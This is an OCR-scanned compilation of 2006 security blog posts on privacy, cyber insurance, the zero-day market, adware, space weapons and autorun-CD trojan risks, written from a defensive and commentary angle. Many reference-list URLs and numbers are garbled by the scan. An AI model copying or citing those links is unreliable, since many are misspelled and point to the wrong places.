[12] 


[13]The Matrix did shock, and set a new benchmark by combining Hollywood’s passion 
for entertainment, and [14]Japan’s [15]culture, still, European productions such as the [16]5th 
Element, and [17]The Immortals, are on my hall of fame for effects and the stories themselves. 
Enjoy it! 


Technorati tags : 


[18]Lone Gunmen, [19]The Outher Limits, [20]Lawnmower Man, [21]lmmortals, [22]Enki 
Bilal, [23]Nikopol Trilogy, [24]Techno Thriller, [25]Cyberpunk 


1. http: //ddanchev. blogspot . com/2006/03/dva-of-past-weekend. html 

2. http: //ddanchev. blogspot . com/2006/02/dvd-of-weekend-1one-gunmen. html 

3. http: //ddanchev. blogspot .com/2006/02/dvd-of-weekend-outer-limits-sex-and.html 
4. http: //en. wikipedia. org/wiki/Techno-thriller 

5. http://www. blogger . com/ comment . g7blogID=18493443&post ID=1 14164907 056399632 

6 

7 

8 

9 


. http://www. cyberpunkreview.com/ 
. http: //bilal.enki.free.fr/ 


ttp://www.mediadis.com/video/detail .asp?id=138924 


ttp://en.wikipedia.org/wiki/La_Foire_aux_immortels 


10. http://en.wikipedia. org/wiki/Immortel_(Ad_Vitam) 


. http: //www.fi-sci.net/index.php?option=com_content&task=viewkid=589&Itemid=71 


. http://photos1. blogger . com/blogger/1933/1779/1600/immortals_the_movie_2.0. jpg 
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15, 

16. 
18. 

19, 

20. 

21. 

22, 

23, 
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25, 
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2.3.9 Security vs Privacy or what’s left from it (2006-03-15 12:41) 


My latest privacy related posts had to do with "[1]The Future of Privacy = don’t over-empower 
the watchers!" and "[2]Data mining, terrorism and security" in respect to the the still active 
TIA and the hopes for the effectiveness out of data mining. While these are important topics 
| feel every decent citizen living in the 21st century should be aware of - many still "think 
conspiracies" than real-life scenarios. At the bottom line, privacy violations for the sake of 
your security and civil liberties are a common event these days! 


Today, | came across an article "[3]Google must capitulate to DoJ, says judge" in [4]rela- 
tion [5]to the DoJ’s subpoena trying to get access to random sites and searches in order to 
justify its statement that anti-porn filters do not protect young children online. 


The NYtimes is also a running a story on [6]this. What | truly liked is US District Judge 
James Ware’s comment that he was reluctant to give the Justice Department everything it 
wanted because of the "perception by the public that this is subject to government scrutiny" 
when they type search terms into Google.com, that’s right, but you would be also right to 
conclude that such requests would turn into a habit given Google’s data aggregation power. 
It’s S a complex process to run the world’s most popular search engine when everyone wants 
to take a bite from you, at least they have hell of motto to sort of guide them in future 
situations like this, but is it? 


This time it’s a misjudged online porn request that gets approved, next time, it would 
be Google against [7]the [8]terrorists, again, for the sake of your Security, one backed up by 
a little bit of glue as on the majority of occasions! 


Technorati tags : 
[9]Privacy, [10]Google, [11]Search Engine 
1. http: //ddanchev. blogspot .com/2006/03/future-of-privacy-dont-over-empower .htm 


2. http: //ddanchev. blogspot. com/2006/03/data-mining-terrorism-and-security.htm 
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6. 


ttp://ddanchev. blogspot .com/2006/01/feds- google-msns-reaction-and-how-you.htm 


http: //www.nytimes .com/2006/03/15/technology/15google . htm1?ex=1300078800&en=c701e37ac929f3dckei=5090&part 


Z 

8 
9. 
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2.3.10 Old physical security threats still working (2006-03-16 17:50) 


In "[1]The Complete Windows Trojans Paper" that | released back in 2003 (you can also 
update yourself with some [2]recent [3]malware trends!) | briefly mentioned on the following 
possibility as far as physical security and malware was concerned : 


"Another way of infecting while having physical access is the Auto-Starting CD function. 
You’ve probably noticed that when you place a CD in your CDROM, it automatically starts with 
some setup interface; here’s an example of the Autorun.inf file that is placed on such CD’s: 
[autorunJopen=setup.exeicon=setup.exe So you can imagine that while running the real 
setup program a trojan could be run VERY easily, and as most of you probably don’t know 
about this CD function they will get infected and won’t understand what happened and how 
it’s been done. Yeah, | know it’s convenient to have the setup.exe autostart but security is 
what really matters here, that’s why you should turn off the Auto-Start functionality by doing 
the following: Start Button -> Settings -> Control Panel ->System -> Device Manager -> 
CDROM -> Properties -> Settings" 


and another interesting point : 


"| know of another story regarding this problem. It’s about a Gaming Magazine that 
used to include a CD with free demo versions of the latest games in each new edition. The 
editors made a contest to find new talents and give the people programming games the 
chance to popularise their productions by sending them to the Editors. An attacker infected 
his game with a new and private trojan and sent it to the Magazine. In the next edition the 
"game" appeared on the CD and you can imagine the chaos that set in." 
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Things have greatly changed for the last three years, while it may seem that global mal- 
ware outbreaks are the dominant trend, slow worms, Oday malware and any other "beneath 
the AVs radar" concepts seem to be the next pattern. 


It’s "great" to find out that age-old CD trick seems to be fully working, whereas | can’t 
reckon someone was saying "Hello World" to [4]WMF’s back then! TechWorld wrote a great 
article two days ago titled "[5]Workers duped by simple CD ruse", an excerpt : 


"To office workers trudging to their cubicles, the promotion looked like a chance at sweet relief 
from the five-day-a-week grind. By simply running a free CD on their computers, they would 
have a chance to win a vacation. But the beguiling morning giveaway in London’s financial 
district last month was more nefarious than it appeared. When a user ran the disc, the code 
on it prompted a browser window that opened a Web site, Chapman said. The site then tried 
to load an image from another Web site, Chapman said." 


While we can argue how vulnerable to security theats and end user is these days, com- 
pared to physical security ones, there are lots of [6]cases [7]pointing out the targeted nature 
of attacks, and the simple diversification of attack methods from what is commontly accepted 
as current trend. My point is that if you believe the majority of threats are online based ones, 
someone will exploit this attitude of yours and target you physically. 


And while | feel the overall state of physical security in respect to end users and their 
workstations has greatly improved with initiatives such as ensuring the host’s integrity and 
IPSs, what you should consider taking care of is - who is capable of peeping behind your back 
and what effect may it have on any of your projects? [8]3M’s Privacy Filters are a necessity 
these days, and an alternative to the obvious [9]C.H.I.M.P. (monitor mirror). Be aware! 
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UPDATE - this post recently appeared at LinuxSecurity.com - [10]Old physical security 
threats still working 


More resources on physical security can also be found at : 


[11]19 Ways to Build Physical Security into a Data Center 

[12]Securing Physical Access and Environmental Services for Datacenters 
[13]CISSP Physical Security Exam Notes 

[14]Physical Security 101 


[15]SANS Reading Room’s Physical Security section 


Technorati tags : 


[16]Security, [17]Physical Security, [18]Workplace 


http: //www.windowsecurity.com/whitepapers/The_Complete_Windows_Trojans_Paper.htm 


. http: //ddanchev. blogspot .com/2006/02/recent-malware-developments.htm 
. http: //ddanchev. blogspot .com/2006/01/malware-future-trends .htm 
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. http: //www.techworld.com/security/news/index.cfm?NewsID=556 


. http: //arik.baratz.org/wordpress/2005-05-29/trojan-horses- abound 


; 

10. 

11. 

12. 

13. http://home.pacific.net .hk/~kplab/CISSP_Exam_Notes_Physical_Security_v1.1.pdf 
14. 

15. 
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16. http://technorati.com/tag/Securit 
17. bttp://technorati.com/tag/Physical+Securit 
18. http://technorati.com/tag/Workplace 


2.3.11 Getting paid for getting hacked (2006-03-17 13:19) 


In the middle of February, Time Magazine ran a great article on Cyberinsurance or "[1]Shock 
Absorbers", and | feel this future trend deserves a couple of comments, from the article : 


"AS companies grow more dependent on the Internet to conduct business, they have 
been driving the growing demand for cyber insurance. Written premiums have climbed from 
$100 million in 2003 to $200 million in 2005, according to Aon Financial Services Group. The 
need for cyberinsurance has only increased as hacker move away from general mischief 
to targeted crimes for profit. Insurers offer two basic types of cyber insurance: first-party 
coverage will help companies pay for recovery after an attack or even to pay the extortion 
for threatened attacks, while third-party coverage helps pay legal expenses if someone sues 
after a security breach. Demand for insurance is also driven by laws in over twenty states that 
require companies to notify consumers if a breach compromises their personal data. However, 
prevention is still the top priority for most companies, since loss of critical data to competitors 
would do damage beyond the payout of any policy." 


[2]Cyber insurance seems to be an exciting business with a lot of uncertainty compared 
to other industries with more detailed ROls, as | feel the information security one is missing 
a reliable [3]ROSI model. | once blogged about [4]why we cannot measure the real cost of 
cybercrime, and commented the same issue with the "[5]FBI’s 2005 Computer Crime Survey 
- what’s to consider?". Don’t get me wrong, these are reliable sources for various market 
indicators, still the situation is, of course, even worse. 


But how do you try to value security at the bottom line? 


Bargaining with security, and negotiating its cost is projectable and easy to calculate, 
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but whether security is actually in place or somehow improved, seems to be a second priority 
- bad bargaining in the long-term, but marketable one in the short one. 


Going back to the article, | hope there aren’t any [6]botnet herders reading this, espe- 
cially the first-party coverage point. To a certain extend, that’s a very pointless service, as it 
fuels the growth of [7]DDoS extortion, as now it’s the insurer having to pay for it, meaning 
there’re a lot of revenue streams to be taken by the cybergang. While covering the expenses 
of extortion attempts is very marketable, it clearly highlights how immature the current state 
of the concept really is. Something else to consider, is that a lot of companies reasonably take 
advantage of MSSPs with the idea to forward risk/outsource their security to an experienced 
provider, and most importantly, budget with their security spending. And while the [8]Califor- 
nia’s SB 1386 is important factor for growth of the service given the 20 states participating, 
with the number of [9]stolen databases from both, commercial, educational and [10]military 
organizations, insurers will start earning a lot of revenues that could have been perhaps spent 
in security R &D - which | doubt they would spend them on, would they? 


UPDATE: 


The post has just appeared at Net-Security.org - "[11]Getting paid for getting hacked", 
as well as LinuxSecurity.com - "[12]Getting paid for getting hacked" 


Related resources : 


[13]Cyber-Insurance Revisited 

[14]Economics and Security Resource Page 

[15]WEISO5 WorkShop on Economics and Information Security - papers and presentations 
[16]Valuing Security Products and Patches 


[17]The New Economics of Information Security 
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[18]Safety at a Premium 
[19]Cyber Insurance and IT Security Investment Impact on Interdependent Risk 
[20]Valuing Security Products and Patches 


[21]Network Risks, Exposures and Solutions 


Technorati tags : 


[22]Security, [23]ROSI, [24]Cyber Insurance, [25]Economics 


ttp://www.time.com/time/insidebiz/article/0,9171, 1156596, 00.htm 


ttp://www.ecommercetimes.com/story/35045 .htm 
ttp://www.cio.com/archive/021502/security.htm 


| http://adanchey blogspot con/2006/01/hy-we-canno¥-neasure-real=costof tal 
. http: //ddanchev. blogspot . com/2006/01/fbis-2005-computer-crime-survey-whats. html 
| http://adanchey blogspot .con/2006/01 /whatare~botnet-herds-up-to html 

| http://adanchev blogspot .con/2006/02/var~against-botnets-and-ddos- attacks ntl 


ttp://info.sen.ca.gov/pub/01-02/bil1/sen/sb_1351-1400/sb_1386_bil1_20020926_chaptered. htm 


. http: //ddanchev. blogspot .com/2006/01/personal-data-security-breaches.htm 


"http: //adanchev blogspot .con/2006/04/insecure-irony html 
_hetp://net-security.org/nevs.php?id=10604 

| http://www. Aimuxsecurity.con/content/view/122019/66/ 
_hetp://Antosocon.net/vorkahop/pat/5.paf 
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ttp://www.citi.umich. edu/u/rwash/projects/econsec/valuesec-rwash-stiet .pdf 
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18. http://www. csoonline.com/read/120902/safety.htm 
19. http://infosecon.net/workshop/pdf/56. pdf 


ttp://www.citi.umich. edu/u/rwash/projects/econsec/valuesec-rwash-stiet . pdf 
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2.3.12 "Successful" communication (2006-03-17 14:39) 


[1]You know [2]Dilbert, don’t you? | find this cartoon a very good representation of what is 
going on in the [3]emerging [4]market [5]for [6]software [7]vulnerabilities, and of course, its 
[8]OTC [9]trade [10]practices - total miscommunication and different needs and opinions. 
While different opinions and needs provoke quality discussion and | understand the point that 
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everyone is witnessing that something huge is happening, "so why shouldn’t I?", but at the 
bottom line, it’s so obvious that there isn’t any sort of mission or social welfare goal to be 
achieved, that everyone is commercializing what used to be the "information wants to be 
free" attitude. 


Weren’t software vulnerabilities supposed to turn into a commodity given the number of 
people capable and actually discovering them, where "windows of opportunities" get the 
highest priority as a con? That is, compared to [11]commercializing vulnerability research, 
empowering researchers to the skies, and turning vulnerabilities into an IP, totally decentraliz- 
ing the current sources of information, and fueling the growth of underground models, as it’s 
obvious that for the time being vulnerabilities and their early acquirement seems to be where 
the $ is. What do you think? 


Technorati tags : 


[12]Security, [13]Vulnerabilities, [14]Oday, [15]Obay, [16]Dilbert 


1, ftp: //photos\, blogger. con/bLogger/1939/1778/1600/8iTbert20060121046790. 1. jp 

2, http:/ wiv. unitednedia, con/conics/dilbert/ 

3, http: //oswdb.org/blog/?p=109 

4, http://blogs.technet .con/ns_schveiz, security_blog/archive/2006/08/17/420992.aspa 
5, http: / /oswdb .org/blog/?p-105 

6, http: //oswdb.org/blog/?p=106 
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. http: //ddanchev. blogspot .com/2005/12/Obay-how-realistic-is-market-for.htm 


ttp://en.wikipedia.org/wiki/Over-the-counter_(finance) 


. http: //ddanchev. blogspot .com/2006/01/was-wmf-vulnerability-purchased-for.htm 


10. http: //ddanchev.blogspot .com/2006/03/wheres-my-Oday-please.htm 


. http: //ddanchev. blogspot .com/2006/02/how-to-win- 10000-bucks-until-end-of .htm 


| http: //tecnorat. com/tag/Socurity 
_ http: //tecnorats. con/tag/Vulnerabilitied 
| http://tecmmorats.con/tag/Obay 
| http: //technorats.con/tag/Dilber? 


2.3.13 Is a Space Warfare arms race really coming? (2006-03-20 21:47) 


In one of my previous posts "[1]Who needs nuclear weapons anymore?" | was emphasizing on 
another, much more assymentric, still dangerous alternative, [2]EMP weapons. | came across 
to a recent Boston.com article titled "[3]Pentagon eyeing weapons in space" that’s gives a 
relevant overview of the current state of the U.S’s ambitions, an excerpt : 
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"The Pentagon is asking Congress for hundreds of millions of dollars to test weapons in 
space, marking the biggest step toward creating a space battlefield since President Reagan’s 
long-defunct [4]”star wars" project during the Cold War, according to federal budget docu- 
ments." 


as well as some of the projects the request is going to be spent on : 


-"One $207 million project by the Missile Defense Agency features experiments on micro- 
satellites, including using one as a target for missiles. This experiment “is particularly 
troublesome," according to the joint report, "as it would be a de-facto antisatellite test." " 


-"A project description says the Air Force would test a variety of powerful laser beams 
"for applications including antisatellite weapons." 


-"The agency also has asked Congress for $220 million for "Multiple Kill Vehicles," a pro- 
gram that experts say could be proposed as a space-based missile interceptor." 


-"Meanwhile, the Air Force wants $33 million for the Hypersonic Technology Vehicle, en- 
visioned as space vehicle capable of delivering a military payload anywhere on earth within 
an hour, according to an official project description." 


Big government contractors(the majority of and past revenues secured bygovernment 
contracts) such as [5]Northrop Grumman and [6]Lockhead Martin are more than eager to get 
hold of implementing these projects and launching them into space. 
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| highly recommend you to read [7]Space Warfare Foolosophy: Should the United States 
be the First Country to Weaponize Space? if you want to go through a very good point of view 
- it’s all about politics and who feels like getting superior. An [8]arms race is slowly emerging, 
and that’s the distrurbing part! 


As a matter of fact, SFAM from the [9]CyberpunkReview.com has recently featured a re- 
view of one of the best X-files episodes "[10]Kill Switch" where the main characters try to 
escape an Al playing with leftover Star Wars military orbital lasers . 


More resources can also be found at: 


[11]Orbital Weaponry 

[12]Space Based Weapons 

[13]Space Warfare Weapons 

[14]SpaceWar.com 

[15]Militarization and Weaponization of Space 
[16]Space and Electronifc Warfare (ELINT) Lexicon 
[17]Gyre’s Space Warfare section 

[18]Directed Energy Warfare - Space Age Weapons 
[19]Secret Orbiter System Revealed 

[20]Military Transformation Uplink: March 2006 


[21]Anti-Satellite Weapons 
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[22]Military Space Programs 

[23]Space Weapons For Earth Wars 

[24]The Revolution in War (227 pages) 

[25]A Political Strategy for Antisatellite Weaponry 
[26]Space Weapons - Crossing the U.S Rubicon 
[27]Preventing the Weaponization of Space 
[28]Space Weapons: The Urgent Debate 
[29]Satellite Killers and Space Dominance 
[30]The Advent of Space Weapons 

[31]US Space Command Vision for 2020 


[32]China’s Space Capabilities and the Strategic Logic of Anti-Satellite Weapons 


[33]U.S. Air Force Plans for Future War in Space - 2004 


[34]Space Warfare in Perspective - 1982 


Technorati tags : 


[35]EMP, [36]Nuclear, [37]War, [38]Space, [39]Space Warfare, [40]Space Weapons, [41]Secu- 
rity 


. http: //ddanchev. blogspot . com/2006/02/who-needs-nuclear-weapons-anymore.htm 
. http://en. wikipedia. org/wiki/Electromagnetic_pulse 
. http: //www.boston.com/news/nation/articles/2006/03/14/pentagon_eyeing weapons_in_space/ 


ttp://en.wikipedia.org/wiki/Strategic_Defense_Initiative 


. http: //www.is.northropgrumman.com/products/dod_products/cwin. htm 
. http: //www.lockheedmartin.com/ 
. http://www.airpower.maxwell.af.mil/airchronicles/cc/koskinas.htm 


ttp://www.cyberpunkreview.com/ 


ttp://en.wikipedia.org/wiki/Arms_race 
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2.3.14 The Practical Complexities of Adware Advertising (2006-03-21 13:10) 


A report [1]released by the The Center for Democracy and Technology yesterday, "[2]How 
Advertising Dollars Encourage Nuisance and Harmful Adware and What Can be Done to 
Reverse the Trend", outlines the practical complexities of Adware Advertising. It gives a great 
overview of the parties involved, discusses a case study "CDT egages the advertisers", as well 
as outlines a possible solution, namely Adoption and Enforcement of Advertising Placement 
Policies. Here’s a excerpt from the research findings : 


"At this point, CDT has set a low bar by merely asking a small group of companies to 
contact us to discuss their advertising policies in the context of nuisance and harmful adware. 
We are working to increase awareness of the complex business models associated with nui- 
sance and harmful adware, and we are pointing advertisers to policies and criteria that already 
exist as a step towards creating and enforcing their own policies. It is also imperative that 
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advertising networks engage in self-regulation in order to aid in this endeavor. Initiatives such 
as the TRUSTe Trusted Download Program can help to set certification standards and provide 
public criteria for evaluating adware makers. Advertisers must demand strict compliance 
from their affiliates and refuse to work with blind networks and other networks that cannot 
commit to following stringent advertising policies. Without advertising dollars, there would 
be no nuisance or harmful adware. CDT is committed to working with advertisers to stem the 
tide of this nefarious form of software." 


Now, if major advertising platforms start measuring the [3]maliciousness of the Web, namely 
evaluate the participants’ condition on a regular basis, they will loose the scale necessary 
for generating the billions of dollars necessary to, sort of, live with [4]click-fraud. In respect 
to future [5]Jonline advertising trends, | feel that cost per performance/action model, would 
sooner or later emerge, given the successful collective bargaining of all the sites participating 
- | really hope so! 


How it would influence Google’s ability to perform financially, contribute to the growth 
of Web 2.0, being among the few companies born in, is yet another topic to speculate on. As a 
matter of fact, Google recently launched [6]Google Finance, still | miss what’s all the buzz all 
about as compared to [7]Yahoo’s Finance Google still has a lot of job to do, given they actually 
want to turn and position themselves as Yahoo! 2.0 in respect to turning into a Internet Portal 
- which | doubt as they tend to be rather productive while disrupting. 


Great [8]report, so consider going through it. And, in case you’re interested in learning 
more about the different soyware/adware legislations, current and future trends, you can also 
check [9]Ben Edelman’s and [10]Eric Goldman’s outstanding research on the topic. 


The post recently appeared at Net-Security.org - "[11]The practical complexities of ad- 
ware advertising" 
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More resources can also be found at: 


[12]Spyware/Adware Podcasts 
[13]Top 10 Anti Spyware Apps reviewed 


[14]Clean and Infected File Sharing Programs 


Technorati tags : 


[15]Security, [16]Spyware, [17]Adware, [18]Advertising, [19]Center for Democracy and 
Technology 


1 
2. http: //www.cdt .org/privacy/20060320adware. pdt 
3. http: //ddanchev. blogspot . com/2006/02/1ook-whos-gonna-cash-for-evaluating. html 
4 1 

5. http://www. businessweek . com/magazine/content/06_13/b3977401.. htm 

6. http://finance.google.com/finance 

7. http://finance.yahoo.com/ 

8 
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. http://www. cdt.org/privacy/20060320adware. pdf 


. http://www. benedelman.org/ 
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2.3.15 Privacy issues related to mobile and wireless Internet access (2006-03-21 17:24) 


[1]l just came across a research worth checking out by all the [2]wardrivers and mobile/wireless 
Internet users out there. While it’s written in 2004, "[3]Privacy, Control and Internet Mobility", 
provides relevant info on an important topic - what kind of information is leaking and how can 
this be reduced. The abstract describes it as : 


3 


N 
fee) 


"This position paper explores privacy issues created by mobile and wireless Internet ac- 
cess. We consider the information about the users identity, location, and the serviced 
accessed that is necessarily or unnecessarily revealed observers, including the access 
network, interme- diaries within the Internet, and the peer endpoints. In particular, we are 
interested in data that can be collected from packet headers and signaling messages and 
exploited to control the users access to communications resources and online services. We 
also suggest some solutions to reduce the amount of information that is leaked." 


A more in-depth overview on the topic can also be found in "[4]JA Framework for Loca- 
tion Privacy in Wireless Networks", an excerpt : 


"For example, even if an anonymous routing protocol such as [5]JANODRis used, an attacker 
can track a user’s location through each connection, and associate multiple connections with 
the same user. When the user arrives at home, she will have left a trail of packet crumbs 
which can be used to determine her identity. In this paper, we explore some of the possible 
requirements and designs, and present a toolbox of several techniques that can be used to 
achieve the required level of privacy protection." 


Mobile/Wireless location privacy would inevitable emerge as an important issue given 
the growth of that type of communication, and the [6]Jobvious [7]abuses of it. 


Technorati tags : 


[8]Security, [9]Privacy, [10]Wireless, [11]Mobile, [12]Tracking 
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. http: //technorati.com/tag/Securit 
. http: //technorati.com/tag/Privac 


12. http://technorati.com/tag/Tracking 


2.3.16 DVD of the Weekend - War Games (2006-03-27 14:44) 


Hi folks, as it’s been a while since | last posted a quality post, | feel it’s about time | catch up 
with some recent events. What I’m currently working on, is gathering a very knowledgaable 
bunch of dudes in order to open up a discussion on the [l]emerging market for Oday vulnera- 
bilities, and I’m very happy about the guys that have already showed interest in what | plan 
to do - more on that around the week, or the beginning of the next week. 


As you're all hopefully aware by now, yet another [2]Oday IE vulnerability is in the wild, 
so either change your browsing habits for a little while(don’t or you lose the battle, as [3]se- 
cure surfing is still possible to a certain extend), or consider switching to another alternative 
- security through obscurity isn’t the panacea of fighting the problem in here, instead it’s 
just a temporary precaution. On the other hand I’m desperately trying to promote my [4]RSS 
compatible feed URL to make it easier for everyone to keep up to date with posts, whereas 
the majority of readers seem to enjoy reading the blog directly, 


| appreciate that! 


As always, it’s disturbing how "quality" always becomes the excuse for security, in re- 
spect to MS delaying patches (or is it [5]just patches [6Jonly?) whereas [7]WebSense is 
already aware of over 200 web sites disseminating the exploit code, | wonder are they 
counting the hundreds of thousands of zombie pcs acting as propagation vectors. In one of 
my previous posts "[8]5 things Microsoft can do to secure the Internet, and why it wouldn’t?" 
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| tried to summarize some of my thoughts on the problem, while on the other hand things 
definitely [9]change pretty fast as always - for the good | hope! Was [10]the [11 ]participants’ 
secrecy in place, in order not to get a "shame on you" look from fellow hackers, whatever the 
reason, | doubt anyone is going to change their hats soon. 


UPDATE : 


[12]Déja Vu as Third Parties Ship IE Patches, and the [13]patches [14]themselves, while 
on the other hand it’s great that anti-virus vendors have as well started detecting malicious 
sites using it. 


Going back this weekend’s DVD (check out the previous [15]DVDs and [16]vibes as well) 
[17]War Games has shaped not just imaginations back in 1983, but acted as an important 
factor for the rise of another generation - not wardialers, but wannabe hackers obsessed with 
command’n’control strategies such as [18]Civilization 1 or [19]Dune II, or at least that’s how | 
remember it. Today’s War Games have another dimension and it’s called [20]Network-Centric 
Warfare, or military communications and control over IP, and while there’s a little chance an 
Al would malfunction and cause Doom’s day, [21]human factor mistakes will always prevail. 
As always, SFAM seems to have reviewed the majority of [22]cool movies, so check out the 
review. 


Technorati tags : 


[23]Weekend, [24]War Games, [25]Cyberpunk 


_op:/Adanchev. blogspot con/2006/09/sheres-ny-Oday-please neal 
 fep://iec, sans. org/ diary phptovoryud-i2aq 
_hetp://wiw.cort.org/archive/paf/orowser_security0601, pal 

| http:/ /feede. feedburner. con/DanchoDancheyOnSecurityhndlewedia 
_hetp://news. bbc. co. uk/2/si/wusiness/4891974. st 

. http://www. internetnews .com/bus-news/article .php/3594051 
_hetp:/ /wiw.uebsensosecuritylabs.con/alerts/alert.php?ALertID=45 


ttp://ddanchev.blogspot.com/2006/03/5-things-microsoft-can-do-to-secure.htm 


ttp://www.informationweek.com/windows/showArticle. jhtml?articleID=183702746 


10. http://www. computerworld.com/securitytopics/security/story/0, 10801, 109606, 00. htm 
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11. http: //www.microsoft.com/technet/security/bluehat/sessions/default .mspx 
12. http://www.eweek.com/article2/0, 1895, 1943687 ,00.asp 
. http: //www.eeye.com/html/research/tools/JScriptPatchSetup.exe 


Am! : www.aetermina.com/securl _center/securl _adavisories/securi aavisory_marc _1.asp 
ttp:// determi / ity ter/ ity_advi ies/ ityadvisory h272006_1 


15. http: //ddanchev. blogspot. com/2006/03/dvd-of-weekend- immortals. htm 
16. http: //ddanchev.blogspot .com/2006/03/weekend-vibes-psychedelicgoa-trance.htm 


17. http: //www.amazon.com/gp/product/0792838467/qid=1143463509/sr=1-1/ref=sr_1_1/104-0131442-3303906?s=dvd& 
18. 
18. 

Fico cece cag (penta netcaa/ pus neseaeoepuaesey pad 


. http: //www.windowsecurity.com/articles/Reducing Human_Factor_Mistakes.htm 


22. http://w. cyberpunkreviev.con/novie/decade/1980-1989/var~-ganes/ 
| http: //technorats. con/tag/Veokend 

24, http: //vechnorati.con/tag/War-Ganed 
_ http: //tecmnorat. con/tag/Cyberpunl 


2.3.17 Are cyber criminals or bureaucrats the industry’s top performer? 
(2006-03-27 16:25) 


Last week, | came across a great article at Forbes.com, "[1]Fighting Hackers, Viruses, Bureau- 
cracy", an excerpt : 


"Cyber security largely ends up in the backseat," says Kurtz, who prior to lobbying did 
stints in the State Department, the National Security Council and as an adviser to President 
George W. Bushon matters relating to computer security. "Our job is to shine a bright light on 
it, to help people understand it." 


Basically, it provides more info on how bureaucracy tends to dominate, and how secu- 
rity often ends up in the "backseat". Moreover, [2]Paul Kurtz executive director of the [3]Cyber 
Security Industry Alliance and it’s multi-billion market capitalization [4]members can indeed 
become biased on a certain occasions. 


Still, he provides his viewpoint on important legislative priorities : 
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- setting national standards for data breach notification 


PrivacyRight’s "[5]Chronology of Data Breaches Reported Since the ChoicePoint Incident" 
keeps growing with the recent [6]Fidelity’s loss of laptop. Standards for data breach notifi- 
cation are important, and the trends is growing with more states joining this legal obligation 
to notify customers in case their personal information is breached into - given they are 
actually aware of the [7]breach. Moreover, with companies wondering "[8]To report, or not to 
report?" and let me add "What is worth reporting?", Uncle Sam has a lot of work to do, that 
will eventually act as a benchmark for a great number of developed/developing countries. 
[9]Personal data security breaches are inevitable given the unregulated ways of storing and 
processing the data, or is it just to many attack vectors malicious identity thieves could take 
advantage of these days? E-banking is still [LOJinsecure, and [11]protection against phishing 
seems too complicated for the "average victim". [12]Compliance means expenses as well, so 
it better be a long-term one, if one exists given today’s challenging threatscape. 


- a law on spyware 


Do your [13]homework and try to bring some sense into who’s liable for what. [14]Claria 
obviously isn’t, and it’s not just pocket money we’re talking about here. Spyware legislations 
are a very interesting topic, that | also find quite contradictive, laws and legislations change 
quite often, but given the Internet’s disperse international laws, or the lack of such, a spy- 
ware/adware’s vendor business practices may actually be legal under specific laws, or the 
simple absence of these. 


- and ratification of the Council of Europe’s Convention on Cybercrime 


That’s important, the [15]Convention on Cybercrime | mean, would they go as far as rat- 
ifying Europe’s well known stricter compared to the U.S privacy laws? Excluding the [16]data 
retention legislation, and various other [17]privacy issues to keep in mind, there’s this tiny 
sentence in its [18]privacy policy "Google processes personal information on our servers in 


333 


the United States of America and in other countries. 


In some cases, we process personal information on a server outside your own country", 
makes it so virtually easy to bypass a nation’s privacy regulations that | wonder why it hasn’t 
received the necessary attention already. On the other hand, we have Interpol acting as a 
common [19]cybercrime body, that according to a [20]recent article : 


"We need an integrated legal framework to exchange data. A lot of legislation doesn’t 
consider a data stream as evidence, because the evidence is hidden behind Os and 1s. We 
have to rethink the legislative framework". 


There is already such and that’s the [21]NSP-SEC - a volunteer incident response mail- 
ing list, which coordinates the interaction between ISPs and NSPs in near real-time and tracks 
exploits and compromised systems as well as mitigates the effects of those exploits on ISP 
networks. 


Still, The Internet Storm Center remains the most popular [22]Internet Sensor. 


No matter how many [23]security policies you develop and hopefully implement, at the 
bottom line you either need [24]regulations or insightful [25]security czar in charge. And 
while the majority of industry players profitable provide perimeter based defenses, going 
through "[26]2004’s Annual Report to Congress on Foreign Economic Collection and Industrial 
Espionage" a decision-maker will hopefully start perceiving the problem under a different 
angle. While | find [27]plain-text communications a problem, Bluecoat seems to be actively 
working in exactly the [28]opposite direction. And while | find measuring the real [29]cost 
of Cybercrime rather hard, applying a little bit of marginal thinking still [30]comes handy. 
[31]The future of privacy may indeed seem shady to some, and while [32]data mining is 
definitely [33]not the answer, [34]sacrificing security for privacy shouldn’t be accepted at 
all. Moreover, do not take a survey’s results for granted, mainly because "There’s always 
a self-serving aspect to anything a vendor releases," says Keith Crosley, director of market 
development with messaging security vendor Proofpoint, which does a few surveys per year" 
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- in NetworkWorld’s great article "[35]lt’s raining IT security surveys". 


To sum up, | feel in the security world it’s the malicious attacker having the time and fi- 
nancial motivation to "[36]spread ambitions" that outperforms, while in the financial world, 
it’s Symantec that is the top performer - ([37]Google Finance, [38]Yahoo! Finance) with 
its constant acquisitions and trendy business strategy realizing the current shift towards 
convergence in the industry. Wish they could also diversify and take some market share of 
[39]WetPlanet Beverage’s [40]Jolt Cola drink :) 


IIlustration by [41]Mark Zug 


UPDATE : This post was recently featured at LinuxSecurity.com "[42]Are cyber criminals 
or bureaucrats the industry’s top performer?" 


Technorati tags : 


[43]Security, [44]Information Security, [45]Technology, [46]Compliance, [47]Survey, [48]Bu- 
reaucracy, [49]CSIA, [50]Cybercrime 
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_ http://www. bluecoat . com/news/releases/2006/030806_survey. html 
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35 - ity-surveys.htm 

36. http://www.packetstormsecurity.org/papers/general/malware-trends . pdf 

37. http://finance. google.com/finance?q=symantec 

38. http://finance. yahoo. com/q?s=SYMC 

39. http://www. joltcola.com/ 
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2.3.18 Visualization in the Security and New Media world (2006-03-31 11:36) 


[1][2]Information visualization seems to be a growing trend in today’s [3]knowledge driven, 
and information-overloaded society. The following represents a URL tree graph of the Security 
Mind Streams blog - looks resourceful! Want to freely graph your site/blog? Take advantage 
of [4]Texone’s tree, just make sure you don’t forget to press the ESC key at a certain point. 
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(2) 


In my first post related to "[5]Visialization, intelligence and the Starlight project" | intro- 
duced you a fully realistic and feasible solution to filtering important indicators whatever the 
reason. Moreover, | also came across a great [6]visualization of malware activity in another 
post summarizing [7]malware trends around February. What I’m truly enjoying, is the research 
efforts put in the concept by both, security/IT professionals, and new media companies 
realizing that the current state of the mature text-based Web. 


[8] 


Ever wanted to see how noisy connect() scans actually are? In early stage of its devel- 
opment, people are already experimenting with the idea, find more about while going through 
"[9]Passive Visual Fingerprinting of Network Attack Tools" paper. 


Things are getting much more quantitative and in-depth in another recommended read- 
ing on the topic "[10]Real-Time Visualization of Network Attacks on High-Speed Links" whose 
purpose is to "show that malicious traffic flows such as denial-of-service attacks and various 
scanning activities can be visualized in an intuitive manner. A simple but novel idea of plotting 
a packet using its source IP address, destination IP address, and the destination port in a 
3-dimensional space graphically reveals ongoing attacks. Leveraging this property, combined 
with the fact that only three header fields per each packet need to be examined, a fast attack 
detection and classification algorithm can be devised." 


Presented at this year’s BlackHat con "[11]Malware Cinema, a Picture is Worth a Thou- 
